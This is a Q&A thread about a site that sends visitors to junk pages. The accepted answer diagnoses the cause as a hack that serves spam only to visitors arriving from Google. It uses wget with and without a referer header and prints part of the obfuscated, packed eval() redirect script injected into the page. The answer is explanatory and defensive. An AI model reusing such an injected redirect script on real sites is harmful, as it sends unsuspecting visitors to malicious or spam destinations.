# Block Adblock detectors?

Tags: firefox, adblock, advertisements

I guess almost all of you know/use adblock, and some of you probably also know those pages that tell you to disable adblock before you can proceed to their page.

However there also seem to be sites that don't display that page but redirect you to some junk-site (porn-sites, mfa-sites, Bing-serps, etc.). When I first encountered this I was quite a bit puzzled and thought I had caught a virus or something.

**Is there anything I can do about this sort of behavior? Is there an "AdBlock Detector"-Blocker?**

Example [page](http://www.tutorials.de/swing-java2d-3d-swt-jface/267480-swt-tableviewer-labelprovider-problem.HTML) to test this behavior. I'm not sure whether it'll work for you, since accessing their front page directly doesn't give me a message about ads. If it doesn't maybe you could try accessing it through this Google [serp page](http://www.Google.at/search?hl=de&source=hp&biw=1727&bih=1070&q=swt+tableviewer+image&aq=f&aqi=g2&aql=f&oq=) (should be result #2).

(I'm not sure where this is the right place to ask the question, or if Stack Overflow might have been more appropriate, please migrate it if necessary)

Comment: NoScript, maybe?

Answer (score 3, accepted):

What you're seeing is not an AdBlock detector, but rather a website hacked to display spam to people who come from Google. The HTML you get is something completely different.

Normal:

```
$ wget -qO- http://www.tutorials.de/swing-java2d-3d-swt-jface/267480-swt-tableviewer-labelprovider-problem.html | head -n3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" dir="ltr" lang="de" id="vbulletin_html">
<head>
```

With Google referer:

```
che@nok ~ $ wget -qO- --referer=http://www.google.at/ http://www.tutorials.de/swing-java2d-3d-swt-jface/267480-swt-tableviewer-labelprovider-problem.html | head -n3
<html><head></head><body><script type="text/javascript">var vbsp='5DFCF739';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('t a=["\\z\\b\\c\\n\\e\\j\\b","\\k\\b\\c\\n\\e\\j\\b","\\A\\x\\b\\L\\f\\e\\p\\b\\k\\i","\\c\\d\\K\\M\\n\\N\\c\\p\\e\\o\\z","\\q\\d\\d\\J\\e\\b","\\i","\\A\\x\\f\\s\\c\\l\\i\\g","\\D\\F\\k\\f","\\G","\\r\\d\\q\\s\\c\\e\\d\\o","\\l\\c\\c\\f\\H\\g\\g\\j\\P\\Q\\e\\r\\b\\k\\c\\d\\p\\b\\B\\q\\d\\j\\g\\m\\d\\R\\o\\r\\d\\s\\m\\B\\f\\l\\f\\S\\e\\m\\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a[U]+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x
```

Comment: Hm.. that's funny. Guess there are more hacked sites out there than I realized.